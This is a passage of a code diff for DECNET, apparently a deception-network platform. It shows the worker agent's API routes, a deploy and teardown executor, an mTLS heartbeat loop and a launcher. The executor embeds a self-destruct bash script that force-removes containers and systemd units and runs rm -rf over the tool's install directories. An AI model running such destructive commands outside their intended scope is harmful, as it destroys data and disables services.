            # Await the cancelled task so it finishes unwinding; whatever it
            # raises while doing so is deliberately ignored.
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await _bus_heartbeat_task
            _bus_heartbeat_task = None
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
        # The collector task only exists if /topology/apply started it.
        global _collector_task
        if _collector_task is not None and not _collector_task.done():
            _collector_task.cancel()
            try:
                await _collector_task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001
                pass
        _collector_task = None
        # Reset the lazily-created store so a later _store() call reopens it.
        global _topology_store
        if _topology_store is not None:
            _topology_store.close()
            _topology_store = None
 # ASGI application object for the worker agent; routes are registered on it below.
 app = FastAPI(
    title="DECNET SWARM Agent",
    version="0.1.0",
    docs_url=None,    # no interactive docs on worker — narrow attack surface
    redoc_url=None,
    openapi_url=None,
    lifespan=_lifespan,  # startup/shutdown of heartbeats and background tasks
    # App-level response descriptions; individual routes add their own.
    responses={
        400: {"description": "Malformed request body"},
        500: {"description": "Executor error"},
    },
 )
 # ------------------------------------------------------------------ schemas
 class DeployRequest(BaseModel):
    # Request body for POST /deploy.
    config: DecnetConfig = Field(..., description="Full DecnetConfig to materialise on this worker")
    # Both flags are forwarded unchanged to the executor's deploy_async().
    dry_run: bool = False
    no_cache: bool = False
 class TeardownRequest(BaseModel):
    # Request body for POST /teardown.  ``decky_id`` is passed straight to
    # the executor's teardown(); it defaults to None when omitted.
    decky_id: Optional[str] = None
 class MutateRequest(BaseModel):
    # Request body for POST /mutate.
    decky_id: str  # compared against decky names in the worker's saved state
    services: list[str]  # service list to assign to that decky
    dry_run: bool = False  # True: validate only; no background task is spawned
 # ------------------------------------------------------------------ routes
@app.get("/health")
 async def health() -> dict[str, str]:
    return {"status": "ok"}
@app.get("/status")
 async def status() -> dict:
    return await _exec.status()
@app.post(
    "/deploy",
    status_code=202,
    responses={202: {"description": "Deploy accepted; runs in background; lifecycle deltas pushed via heartbeat"}},
 )
 async def deploy(req: DeployRequest) -> dict:
    """Spawn the deploy in the background and return 202 immediately.
    The master tracks per-decky completion via lifecycle deltas pushed on
    the next heartbeat (one immediate push on completion, plus the
    scheduled 30 s ticks as a fallback).  Holding the request open across
    a multi-minute compose build was the previous source of the wizard
    API-hang."""
    asyncio.create_task(
        _exec.deploy_async(req.config, dry_run=req.dry_run, no_cache=req.no_cache),
        name=f"deploy-{id(req)}",
    )
    return {"status": "accepted", "deckies": [d.name for d in req.config.deckies]}
@app.post(
    "/teardown",
    responses={500: {"description": "Teardown raised an exception"}},
 )
 async def teardown(req: TeardownRequest) -> dict:
    try:
        await _exec.teardown(req.decky_id)
    except Exception as exc:
        log.exception("agent.teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "torn_down", "decky_id": req.decky_id}
@app.post(
    "/self-destruct",
    responses={500: {"description": "Reaper could not be scheduled"}},
 )
 async def self_destruct() -> dict:
    """Stop all DECNET services on this worker and delete the install
    footprint. Called by the master during decommission. Logs under
    /var/log/decnet* are preserved. Fire-and-forget — the response is sent
    once the reaper has been scheduled, before it starts deleting files.

    NOTE(review): this route declares no ``status_code``, so a successful
    call answers with the framework default rather than 202 — confirm which
    status the master expects.

    Any exception from the executor is logged and returned as HTTP 500.
    """
    try:
        await _exec.self_destruct()
    except Exception as exc:
        log.exception("agent.self_destruct failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "self_destruct_scheduled"}
 # ------------------------------------------------------- topology endpoints
 class ApplyTopologyRequest(BaseModel):
    # Request body for POST /topology/apply.  Both fields are required and
    # are handed to _topology_ops.apply() together with the local store.
    hydrated: dict[str, Any] = Field(
        ..., description="Hydrated topology dict from master.persistence.hydrate()"
    )
    version_hash: str = Field(
        ..., description="Master's canonical_hash(hydrated); must match ours"
    )
 class TeardownTopologyRequest(BaseModel):
    # Request body for POST /topology/teardown.
    topology_id: str = Field(..., description="Topology UUID to dismantle")
@app.post(
    "/topology/apply",
    responses={
        400: {"description": "Malformed hydrated topology or hash mismatch"},
        409: {"description": "A different topology is already applied"},
        500: {"description": "Docker or compose raised while applying"},
    },
 )
 async def topology_apply(req: ApplyTopologyRequest) -> dict:
    store = _store()
    try:
        await _topology_ops.apply(req.hydrated, req.version_hash, store)
    except _topology_ops.HashMismatch as exc:
        raise HTTPException(status_code=400, detail=str(exc)) from exc
    except ValidationError as exc:
        raise HTTPException(status_code=400, detail=str(exc)) from exc
    except AlreadyApplied as exc:
        raise HTTPException(status_code=409, detail=str(exc)) from exc
    except Exception as exc:
        log.exception("agent.topology_apply failed")
        topology_id = (req.hydrated.get("topology") or {}).get("id")
        if topology_id:
            try:
                store.record_error(
                    str(topology_id), str(exc)[:500], hydrated=req.hydrated,
                )
            except Exception:  # noqa: BLE001 — don't mask original failure
                log.exception("failed to record apply error")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    _ensure_collector_started()
    return {"status": "applied", "version_hash": req.version_hash}
@app.post(
    "/topology/teardown",
    responses={500: {"description": "Docker or compose raised while tearing down"}},
 )
 async def topology_teardown(req: TeardownTopologyRequest) -> dict:
    try:
        await _topology_ops.teardown(req.topology_id, _store())
    except Exception as exc:
        log.exception("agent.topology_teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "torn_down", "topology_id": req.topology_id}
@app.get("/topology/state")
 async def topology_state() -> dict:
    return _topology_ops.state(_store())
@app.post(
    "/mutate",
    status_code=202,
    responses={
        202: {"description": "Mutate accepted; runs in background; lifecycle delta pushed via heartbeat"},
        404: {"description": "No active deployment, or unknown decky_id (dry_run validation only)"},
    },
 )
 async def mutate(req: MutateRequest) -> Any:
    """Spawn the mutate in the background and return 202 immediately.
    Master tracks completion via a lifecycle delta pushed on the next
    heartbeat (immediate push on completion).  ``dry_run`` is still
    synchronous — it validates against the worker's current state and
    returns the would-be services without spawning a task or touching
    docker, so the wizard's preview path stays cheap."""
    if req.dry_run:
        from decnet.config import load_state
        state = load_state()
        if state is None:
            raise HTTPException(
                status_code=404,
                detail="no active deployment on this worker",
            )
        cfg, _ = state
        decky = next((d for d in cfg.deckies if d.name == req.decky_id), None)
        if decky is None:
            raise HTTPException(
                status_code=404,
                detail=f"decky {req.decky_id!r} not found in worker state",
            )
        return JSONResponse(
            status_code=200,
            content={
                "status": "dry_run",
                "decky_id": req.decky_id,
                "services": list(req.services),
            },
        )
    asyncio.create_task(
        _exec.mutate_async(req.decky_id, list(req.services)),
        name=f"mutate-{req.decky_id}",
    )
    return {
        "status": "accepted",
        "decky_id": req.decky_id,
        "services": list(req.services),
    }
--- a/decnet/agent/executor.py
+++ b/decnet/agent/executor.py
@@ -0,0 +1,317 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Thin adapter between the agent's HTTP endpoints and the existing
 ``decnet.engine.deployer`` code path.
 Kept deliberately small: the agent does not re-implement deployment logic,
 it only translates a master RPC into the same function calls the unihost
 CLI already uses.  Everything runs in a worker thread (the deployer is
 blocking) so the FastAPI event loop stays responsive.
 """
 from __future__ import annotations
 import asyncio
 from ipaddress import IPv4Network
 from typing import Any
 from decnet.engine import deployer as _deployer
 from decnet.config import DecnetConfig, load_state, clear_state
 from decnet.logging import get_logger
 from decnet.network import (
    allocate_ips,
    detect_interface,
    detect_subnet,
    get_host_ip,
 )
 log = get_logger("agent.executor")
 def _relocalize(config: DecnetConfig) -> DecnetConfig:
    """Rewrite a master-built config to the worker's local network reality.

    The master populates ``interface``/``subnet``/``gateway`` from its own
    box before dispatching, which blows up the deployer on any worker whose
    NIC name differs (common in heterogeneous fleets — master on ``wlp6s0``,
    worker on ``enp0s3``). We always re-detect locally; if the worker sits
    on a different subnet than the master, decky IPs are re-allocated from
    the worker's subnet so they're actually reachable.

    Returns:
        A copy of ``config`` with the local interface, subnet and gateway,
        and (on subnet mismatch) deckies carrying freshly allocated IPs.

    Raises:
        RuntimeError: if re-allocation yields fewer addresses than there
            are deckies.  Without this check the ``zip`` below would
            silently drop the deckies that did not get an address.
    """
    local_iface = detect_interface()
    local_subnet, local_gateway = detect_subnet(local_iface)
    local_host_ip = get_host_ip(local_iface)
    updates: dict[str, Any] = {
        "interface": local_iface,
        "subnet": local_subnet,
        "gateway": local_gateway,
    }
    # strict=False: accept a subnet string that has host bits set.
    master_net = IPv4Network(config.subnet, strict=False) if config.subnet else None
    local_net = IPv4Network(local_subnet, strict=False)
    if master_net is None or master_net != local_net:
        log.info(
            "agent.deploy subnet mismatch master=%s local=%s — re-allocating decky IPs",
            config.subnet, local_subnet,
        )
        fresh_ips = list(
            allocate_ips(
                subnet=local_subnet,
                gateway=local_gateway,
                host_ip=local_host_ip,
                count=len(config.deckies),
            )
        )
        if len(fresh_ips) < len(config.deckies):
            raise RuntimeError(
                f"allocated only {len(fresh_ips)} IPs for "
                f"{len(config.deckies)} deckies on subnet {local_subnet}"
            )
        updates["deckies"] = [
            d.model_copy(update={"ip": ip})
            for d, ip in zip(config.deckies, fresh_ips)
        ]
    return config.model_copy(update=updates)
 async def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False) -> None:
    """Run the blocking deployer in a worker thread.

    Configs whose ``mode`` is ``"swarm"`` are first rewritten by
    ``_relocalize()``; other modes are passed through untouched.  The
    deployer itself calls save_state() internally once the compose file is
    materialised.
    """
    log.info(
        "agent.deploy mode=%s deckies=%d interface=%s (incoming)",
        config.mode, len(config.deckies), config.interface,
    )
    effective = config
    if config.mode == "swarm":
        effective = _relocalize(config)
        log.info(
            "agent.deploy relocalized interface=%s subnet=%s gateway=%s",
            effective.interface, effective.subnet, effective.gateway,
        )
    # The trailing positional False is forwarded as the deployer's fourth
    # argument; its meaning is defined by the deployer — TODO confirm.
    await asyncio.to_thread(_deployer.deploy, effective, dry_run, no_cache, False)
 async def deploy_async(
    config: DecnetConfig, *, dry_run: bool = False, no_cache: bool = False,
 ) -> None:
    """Background-task body for /deploy.

    Runs the deploy and then pushes one lifecycle delta per decky to the
    master, so it sees the terminal state right away instead of waiting for
    the next scheduled heartbeat.  A deploy exception is logged and turned
    into ``failed`` deltas (error text capped at 2000 characters) rather
    than being re-raised; otherwise ``succeeded`` deltas are pushed.
    """
    from datetime import datetime, timezone
    from decnet.agent.heartbeat import push_lifecycle_delta

    decky_names = [d.name for d in config.deckies]

    def _deltas(status: str, error: str | None = None) -> list[dict]:
        # One row per decky; "error" sits before "completed_at" when present.
        rows = []
        for name in decky_names:
            row = {"decky_name": name, "operation": "deploy", "status": status}
            if error is not None:
                row["error"] = error
            row["completed_at"] = datetime.now(timezone.utc).isoformat()
            rows.append(row)
        return rows

    try:
        await deploy(config, dry_run=dry_run, no_cache=no_cache)
    except Exception as exc:  # noqa: BLE001
        log.exception("agent.deploy_async failed")
        err = f"{type(exc).__name__}: {exc}"
        await push_lifecycle_delta(_deltas("failed", err[:2000]))
        return
    await push_lifecycle_delta(_deltas("succeeded"))
 async def mutate_async(decky_id: str, services: list[str]) -> None:
    """Background-task body for /mutate.  Same shape as deploy_async:
    perform the work, then push a single lifecycle delta on
    completion (success or failure).

    Args:
        decky_id: name of the decky to change; matched against ``d.name``
            in the saved state.
        services: replacement service list for that decky.

    A missing saved state, an unknown decky, or any exception raised while
    applying the change each result in one ``failed`` delta.
    """
    import time
    from datetime import datetime, timezone
    from decnet.composer import write_compose
    from decnet.config import load_state, save_state
    from decnet.engine import _compose_with_retry
    from decnet.agent.heartbeat import push_lifecycle_delta
    def _delta(status: str, error: str | None = None) -> dict:
        # Build the lifecycle row for this decky; error text is capped at
        # 2000 characters.
        out = {
            "decky_name": decky_id, "operation": "mutate",
            "status": status,
            "completed_at": datetime.now(timezone.utc).isoformat(),
        }
        if error is not None:
            out["error"] = error[:2000]
        return out
    try:
        state = load_state()
        if state is None:
            await push_lifecycle_delta(
                [_delta("failed", "no active deployment on this worker")],
            )
            return
        cfg, compose_path = state
        decky = next((d for d in cfg.deckies if d.name == decky_id), None)
        if decky is None:
            await push_lifecycle_delta(
                [_delta("failed", f"decky {decky_id!r} not found in worker state")],
            )
            return
        decky.services = list(services)
        decky.last_mutated = time.time()
        # State and compose file are written before compose runs, so they
        # already reflect the new services if the "up" below fails.
        save_state(cfg, compose_path)
        write_compose(cfg, compose_path)
        # The compose invocation runs in a worker thread, off the event loop.
        await asyncio.to_thread(
            _compose_with_retry, "up", "-d", "--remove-orphans",
            compose_file=compose_path,
        )
    except Exception as exc:  # noqa: BLE001
        log.exception("agent.mutate_async failed decky=%s", decky_id)
        err = f"{type(exc).__name__}: {exc}"
        await push_lifecycle_delta([_delta("failed", err)])
        return
    await push_lifecycle_delta([_delta("succeeded")])
 async def teardown(decky_id: str | None = None) -> None:
    """Run the deployer's teardown in a worker thread.

    ``decky_id`` is handed to the deployer as-is.  When it is ``None`` the
    saved state is cleared afterwards as well.
    """
    log.info("agent.teardown decky_id=%s", decky_id)
    await asyncio.to_thread(_deployer.teardown, decky_id)
    full_teardown = decky_id is None
    if full_teardown:
        await asyncio.to_thread(clear_state)
 def _decky_runtime_states(config: DecnetConfig) -> dict[str, dict[str, Any]]:
    """Map decky_name → {"running": bool, "services": {svc: container_state}}.
    Queried so the master can tell, after a partial-failure deploy, which
    deckies actually came up instead of tainting the whole shard as failed.
    Best-effort: a docker error returns an empty map, not an exception.
    """
    try:
        import docker  # local import — agent-only path
        client = docker.from_env()
        live = {c.name: c.status for c in client.containers.list(all=True, ignore_removed=True)}
    except Exception:  # pragma: no cover — defensive
        log.exception("_decky_runtime_states: docker query failed")
        return {}
    out: dict[str, dict[str, Any]] = {}
    for d in config.deckies:
        svc_states = {
            svc: live.get(f"{d.name}-{svc.replace('_', '-')}", "absent")
            for svc in d.services
        }
        out[d.name] = {
            "running": bool(svc_states) and all(s == "running" for s in svc_states.values()),
            "services": svc_states,
        }
    return out
 # Bash source of the self-destruct reaper.  self_destruct() writes this
 # text to a temp file and launches it with /bin/bash; the script's last
 # step removes its own file.
 _REAPER_SCRIPT = r"""#!/bin/bash
 # DECNET agent self-destruct reaper.
 # Runs detached from the agent process so it survives the agent's death.
 # Waits briefly for the HTTP response to drain, then stops services,
 # wipes install paths, and preserves logs.
 set +e
 sleep 3
 # Stop decky containers started by the local deployer (best-effort).
 if command -v docker >/dev/null 2>&1; then
    docker ps -q --filter "label=com.docker.compose.project=decnet" | xargs -r docker stop
    docker ps -aq --filter "label=com.docker.compose.project=decnet" | xargs -r docker rm -f
    docker network rm decnet_lan 2>/dev/null
 fi
 # Stop+disable every systemd unit the installer may have dropped.
 for unit in decnet-agent decnet-engine decnet-collector decnet-forwarder decnet-prober decnet-reconciler decnet-sniffer decnet-updater; do
    systemctl stop "$unit" 2>/dev/null
    systemctl disable "$unit" 2>/dev/null
 done
 # Nuke install paths. Logs under /var/log/decnet* are intentionally
 # preserved — the operator typically wants them for forensic review.
 rm -rf /opt/decnet* /var/lib/decnet/* /usr/local/bin/decnet* /etc/decnet
 rm -f /etc/systemd/system/decnet-*.service /etc/systemd/system/decnet-*.timer
 systemctl daemon-reload 2>/dev/null
 rm -f "$0"
 """
 async def self_destruct() -> None:
    """Tear down deckies, then launch a detached reaper script.

    The reaper (``_REAPER_SCRIPT``) wipes the install footprint.  This
    coroutine returns as soon as the reaper process has been spawned, so the
    HTTP response can drain before files start disappearing from under the
    agent.
    """
    import os
    import shutil
    import subprocess  # nosec B404
    import tempfile

    # Best-effort teardown first — the reaper also runs docker stop, but
    # going through the deployer gives the host-macvlan/ipvlan helper a
    # chance to clean up routes cleanly.
    try:
        await asyncio.to_thread(_deployer.teardown, None)
        await asyncio.to_thread(clear_state)
    except Exception:
        log.exception("self_destruct: pre-reap teardown failed — reaper will force-stop containers")

    # Reaper lives under /tmp so it survives rm -rf /opt/decnet*.
    fd, path = tempfile.mkstemp(prefix="decnet-reaper-", suffix=".sh", dir="/tmp")  # nosec B108 — reaper must outlive /opt/decnet removal
    try:
        os.write(fd, _REAPER_SCRIPT.encode())
    finally:
        os.close(fd)
    os.chmod(path, 0o700)  # nosec B103 — root-owned reaper, needs exec

    # The reaper MUST run outside decnet-agent.service's cgroup — otherwise
    # `systemctl stop decnet-agent` SIGTERMs the whole cgroup (reaper
    # included) before rm -rf completes.  A new POSIX session alone does not
    # leave the systemd cgroup, so when systemd-run is available the script
    # is started through it as its own transient unit named
    # decnet-reaper-<pid>.  Without systemd-run (non-systemd host /
    # container) the script is started directly.
    reaper_cmd = ["/bin/bash", path]
    systemd_run = shutil.which("systemd-run")
    if systemd_run:
        argv = [
            systemd_run,
            "--collect",
            "--unit", f"decnet-reaper-{os.getpid()}",
            "--description", "DECNET agent self-destruct reaper",
            *reaper_cmd,
        ]
    else:
        argv = reaper_cmd
    subprocess.Popen(  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        close_fds=True,
        start_new_session=True,
    )
    via = "systemd-run" if systemd_run else "popen"
    log.warning(
        "self_destruct: reaper spawned path=%s via=%s — agent will die in ~3s",
        path, via,
    )
 async def status() -> dict[str, Any]:
    """Report the worker's saved deployment plus live container states.

    Returns ``{"deployed": False, "deckies": []}`` when no state is saved.
    Otherwise the mode, compose path, dumped decky models and the
    per-decky runtime map are returned.  Both the state load and the
    docker query run in worker threads.
    """
    state = await asyncio.to_thread(load_state)
    if state is None:
        return {"deployed": False, "deckies": []}
    config, compose_path = state
    runtime = await asyncio.to_thread(_decky_runtime_states, config)
    deckies = [decky.model_dump() for decky in config.deckies]
    return dict(
        deployed=True,
        mode=config.mode,
        compose_path=str(compose_path),
        deckies=deckies,
        runtime=runtime,
    )
--- a/decnet/agent/heartbeat.py
+++ b/decnet/agent/heartbeat.py
@@ -0,0 +1,210 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent → master liveness heartbeat loop.
 Every ``INTERVAL_S`` seconds the worker posts ``executor.status()`` to
 ``POST <master>/swarm/heartbeat`` over mTLS. The master pins the
 presented client cert's SHA-256 against the ``SwarmHost`` row for the
 claimed ``host_uuid``; a match refreshes ``last_heartbeat`` + each
 ``DeckyShard``'s snapshot + runtime state.
 Identity comes from ``/etc/decnet/decnet.ini`` (seeded by the enroll
 bundle) — specifically ``DECNET_HOST_UUID`` and ``DECNET_MASTER_HOST``.
 The worker's existing ``~/.decnet/agent/`` bundle (or
 ``/etc/decnet/agent/``) provides the mTLS client cert.
 Started/stopped via the agent FastAPI app's lifespan. If identity
 plumbing is missing (pre-enrollment dev runs) the loop logs at DEBUG and
 declines to start — callers don't have to guard it.
 """
 from __future__ import annotations
 import asyncio
 import pathlib
 from typing import Optional
 import httpx
 from decnet.agent import executor as _exec
 from decnet.logging import get_logger
 from decnet.swarm import pki
 from decnet.swarm.log_forwarder import build_worker_ssl_context
 log = get_logger("agent.heartbeat")
 INTERVAL_S = 30.0
 _TIMEOUT = httpx.Timeout(connect=5.0, read=10.0, write=5.0, pool=5.0)
 _task: Optional[asyncio.Task] = None
 def _resolve_agent_dir() -> pathlib.Path:
    """Match the agent-dir resolution order used by the agent server:
    DECNET_AGENT_DIR env, else /etc/decnet/agent (production install),
    else ~/.decnet/agent (dev)."""
    import os
    env = os.environ.get("DECNET_AGENT_DIR")
    if env:
        return pathlib.Path(env)
    system = pathlib.Path("/etc/decnet/agent")
    if system.exists():
        return system
    return pki.DEFAULT_AGENT_DIR
 async def _build_body(
    host_uuid: str,
    agent_version: str,
    lifecycle: Optional[list[dict]] = None,
 ) -> dict:
    """Assemble the JSON body for one heartbeat POST.
    Args:
        host_uuid: identity this worker claims towards the master.
        agent_version: version string reported alongside the status.
        lifecycle: optional list of lifecycle deltas; attached under the
            ``lifecycle`` key only when non-empty.
    Returns:
        A dict with ``host_uuid``, ``agent_version`` and ``status`` (the
        executor snapshot), plus ``topology`` when the applied-topology
        snapshot could be read and ``lifecycle`` when deltas were given.
    """
    snap = await _exec.status()
    body: dict = {
        "host_uuid": host_uuid,
        "agent_version": agent_version,
        "status": snap,
    }
    def _topology_snapshot() -> dict:
        # Opens the sqlite-backed store, reads the snapshot and always
        # closes the connection again — all within a single worker thread.
        from decnet.agent import topology_ops as _topo_ops
        from decnet.agent.topology_store import TopologyStore
        store = TopologyStore(_resolve_agent_dir() / "topology.db")
        try:
            return _topo_ops.state(store)
        finally:
            store.close()
    # Best-effort: fold in applied-topology snapshot. Failures must never
    # wedge the heartbeat loop — master will fall back to "no topology
    # reported" which triggers a resync if it expected one.
    # The snapshot does synchronous sqlite + docker calls, so it runs in a
    # worker thread (same approach as executor.status()) instead of
    # stalling the event loop that also serves the agent's endpoints.
    try:
        body["topology"] = await asyncio.to_thread(_topology_snapshot)
    except Exception:
        log.debug("heartbeat: topology state unavailable", exc_info=True)
    if lifecycle:
        body["lifecycle"] = lifecycle
    return body
 async def _tick(client: httpx.AsyncClient, url: str, host_uuid: str, agent_version: str) -> None:
    """Send one scheduled heartbeat and warn if the master does not accept it.
    Args:
        client: open HTTP client used for the POST.
        url: heartbeat endpoint on the master.
        host_uuid: identity this worker claims.
        agent_version: version string included in the body.
    A non-success status is only logged, never raised: 403 / 404 are
    terminal-ish, but the caller keeps looping because an operator may
    re-enrol the host mid-session.  The warning is loud so prod ops can
    spot cert-pinning drift.
    """
    body = await _build_body(host_uuid, agent_version)
    resp = await client.post(url, json=body)
    # Accept the same success codes as push_lifecycle_delta, which posts to
    # the same endpoint; treating a 200 as "rejected" would emit a spurious
    # warning on every tick.
    if resp.status_code in (200, 204):
        return
    log.warning(
        "heartbeat rejected status=%d body=%s",
        resp.status_code, resp.text[:200],
    )
 async def _loop(url: str, host_uuid: str, agent_version: str, ssl_ctx) -> None:
    """Post a heartbeat every ``INTERVAL_S`` seconds until cancelled.
    One HTTP client (built with *ssl_ctx* and the module timeout) is kept
    open for the lifetime of the loop.  A failing tick is logged with its
    traceback and retried after the normal interval; cancellation is
    re-raised so the task can be stopped.
    """
    log.info(
        "heartbeat loop starting url=%s host_uuid=%s interval=%ss",
        url, host_uuid, INTERVAL_S,
    )
    session = httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT)
    async with session:
        while True:
            try:
                await _tick(session, url, host_uuid, agent_version)
            except asyncio.CancelledError:
                # Never swallow cancellation — stop() relies on it.
                raise
            except Exception:
                log.exception("heartbeat tick failed — will retry in %ss", INTERVAL_S)
            await asyncio.sleep(INTERVAL_S)
 def start() -> Optional[asyncio.Task]:
    """Launch the background heartbeat task, or return the running one.
    Returns ``None`` without starting anything when the host identity
    (``DECNET_HOST_UUID`` / ``DECNET_MASTER_HOST``) is unset or the worker
    SSL context cannot be built, so callers need no guard of their own.
    """
    global _task
    from decnet.env import (
        DECNET_HOST_UUID,
        DECNET_MASTER_HOST,
        DECNET_SWARMCTL_PORT,
    )
    already_running = _task is not None and not _task.done()
    if already_running:
        return _task
    if not (DECNET_HOST_UUID and DECNET_MASTER_HOST):
        log.debug("heartbeat not starting — DECNET_HOST_UUID or DECNET_MASTER_HOST unset")
        return None
    agent_dir = _resolve_agent_dir()
    try:
        ssl_ctx = build_worker_ssl_context(agent_dir)
    except Exception:
        log.exception("heartbeat not starting — worker SSL context unavailable at %s", agent_dir)
        return None
    # The package version is optional; report "unknown" if it can't be read.
    try:
        from decnet import __version__ as agent_version  # type: ignore[attr-defined]
    except Exception:
        agent_version = "unknown"
    endpoint = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
    heartbeat = _loop(endpoint, DECNET_HOST_UUID, agent_version, ssl_ctx)
    _task = asyncio.create_task(heartbeat, name="agent-heartbeat")
    return _task
 async def push_lifecycle_delta(deltas: list[dict]) -> None:
    """Send an immediate, out-of-band heartbeat carrying *deltas*.
    The deltas travel in the ``lifecycle`` field; each one has the shape
    ``{decky_name, operation, status, error?, completed_at?}``.
    The agent executor calls this when /deploy and /mutate complete, so
    the master sees the terminal transition right away instead of waiting
    up to ``INTERVAL_S`` for the next scheduled tick.  Every failure is
    logged and swallowed: the next scheduled heartbeat carries the same
    deltas via DB-side reconciliation, since the worker has no durable
    per-row state to lose.
    """
    from decnet.env import (
        DECNET_HOST_UUID,
        DECNET_MASTER_HOST,
        DECNET_SWARMCTL_PORT,
    )
    if not deltas:
        return
    if not (DECNET_HOST_UUID and DECNET_MASTER_HOST):
        log.debug("push_lifecycle_delta: identity unconfigured — skipping")
        return
    bundle_dir = _resolve_agent_dir()
    try:
        ssl_ctx = build_worker_ssl_context(bundle_dir)
    except Exception:
        log.exception("push_lifecycle_delta: SSL context unavailable")
        return
    # The package version is optional; report "unknown" if it can't be read.
    try:
        from decnet import __version__ as agent_version  # type: ignore[attr-defined]
    except Exception:
        agent_version = "unknown"
    endpoint = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
    try:
        async with httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT) as client:
            payload = await _build_body(
                DECNET_HOST_UUID, agent_version, lifecycle=deltas,
            )
            reply = await client.post(endpoint, json=payload)
            accepted = reply.status_code in (200, 204)
            if not accepted:
                log.warning(
                    "lifecycle delta push rejected status=%d body=%s",
                    reply.status_code, reply.text[:200],
                )
    except Exception:
        log.exception("push_lifecycle_delta failed — next scheduled tick will retry")
 async def stop() -> None:
    """Cancel the background heartbeat task and wait for it to finish.
    A no-op when no task was started.  Whatever the task raises while
    unwinding (including the cancellation itself) is discarded, and the
    module-level handle is reset so ``start()`` can launch a new task.
    """
    global _task
    running = _task
    if running is None:
        return
    running.cancel()
    try:
        await running
    except (asyncio.CancelledError, Exception):
        # Shutdown path: the outcome of the cancelled task is irrelevant.
        pass
    _task = None
--- a/decnet/agent/server.py
+++ b/decnet/agent/server.py
@@ -0,0 +1,71 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Worker-agent uvicorn launcher.
 Starts ``decnet.agent.app:app`` over HTTPS with mTLS enforcement.  The
 worker must already have a bundle in ``~/.decnet/agent/`` (delivered by
 ``decnet swarm enroll`` from the master); if it does not, we refuse to
 start — unauthenticated agents are not a supported mode.
 """
 from __future__ import annotations
 import os
 import pathlib
 import signal
 import subprocess  # nosec B404
 import sys
 from decnet.logging import get_logger
 from decnet.swarm import pki
 log = get_logger("agent.server")
 def run(host: str, port: int, agent_dir: pathlib.Path = pki.DEFAULT_AGENT_DIR) -> int:
    """Launch the agent app under uvicorn with mTLS and wait for it to exit.
    Args:
        host: interface uvicorn binds to.
        port: TCP port uvicorn listens on.
        agent_dir: directory expected to hold ``worker.key``,
            ``worker.crt`` and ``ca.crt``.
    Returns:
        ``2`` when no cert bundle can be loaded from *agent_dir*;
        otherwise the uvicorn process's exit code.  On Ctrl+C the child's
        process group gets SIGTERM, then SIGKILL after 10 seconds; ``0``
        is returned if the group is already gone.
    """
    if pki.load_worker_bundle(agent_dir) is None:
        print(
            f"[agent] No cert bundle at {agent_dir}. "
            f"Run `decnet swarm enroll` from the master first.",
            file=sys.stderr,
        )
        return 2
    tls_args = [
        "--ssl-keyfile", str(agent_dir / "worker.key"),
        "--ssl-certfile", str(agent_dir / "worker.crt"),
        "--ssl-ca-certs", str(agent_dir / "ca.crt"),
        # 2 == ssl.CERT_REQUIRED — clients MUST present a CA-signed cert.
        "--ssl-cert-reqs", "2",
    ]
    cmd = [
        sys.executable, "-m", "uvicorn", "decnet.agent.app:app",
        "--host", host,
        "--port", str(port),
        *tls_args,
    ]
    log.info("agent starting host=%s port=%d bundle=%s", host, port, agent_dir)
    # The child gets its own session (and therefore process group), so a
    # terminal Ctrl+C reaches only this launcher, which then forwards the
    # signal to the whole group (same pattern as `decnet api`).
    child = subprocess.Popen(cmd, start_new_session=True)  # nosec B603
    try:
        return child.wait()
    except KeyboardInterrupt:
        try:
            os.killpg(child.pid, signal.SIGTERM)
            try:
                return child.wait(timeout=10)
            except subprocess.TimeoutExpired:
                # Graceful stop timed out — escalate.
                os.killpg(child.pid, signal.SIGKILL)
                return child.wait()
        except ProcessLookupError:
            return 0
--- a/decnet/agent/topology_ops.py
+++ b/decnet/agent/topology_ops.py
@@ -0,0 +1,220 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Agent-side topology apply/teardown/state primitives.
 Wraps the compose + bridge machinery from :mod:`decnet.engine.deployer`
 so the agent can drive a topology without ever touching the master's
 sqlmodel repo.  The master-side ``deploy_topology`` always calls
 ``transition_status(repo, …)`` which is useless (and unreachable) on
 an agent — here we operate purely on a hydrated dict + the local
 :class:`TopologyStore`.
 v1 constraint: one topology per agent.  A second apply for a different
 ``topology_id`` triggers an on-the-spot teardown of the predecessor
 before the new apply proceeds — master is authoritative.
 """
 from __future__ import annotations
 import asyncio
 import subprocess  # nosec B404
 from typing import Any
 import docker
 from decnet.agent.topology_store import (
    TopologyStore,
    observed,
 )
 from decnet.engine.deployer import (
    _compose,
    _compose_with_retry,
    _teardown_order,
    _topology_compose_path,
    _topology_compose_project,
 )
 from decnet.logging import get_logger
 from decnet.network import create_bridge_network, remove_bridge_network
 from decnet.topology.compose import (
    _network_name as _topology_network_name,
    write_topology_compose,
 )
 from decnet.topology.hashing import canonical_hash
 from decnet.topology.validate import (
    ValidationError,
    errors as _validation_errors,
    validate as _validate_topology,
 )
 log = get_logger("agent.topology_ops")
 class HashMismatch(RuntimeError):
    """Raised when the master-provided ``version_hash`` differs from the
    hash this agent computes locally over the hydrated topology.
    A mismatch suggests serialisation drift between master and agent, so
    the apply fails loudly rather than silently papering over a schema
    mismatch."""
 def _topology_id(hydrated: dict[str, Any]) -> str:
    topo = hydrated.get("topology") or {}
    tid = topo.get("id")
    if not tid:
        raise ValueError("hydrated topology missing topology.id")
    return str(tid)
 def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
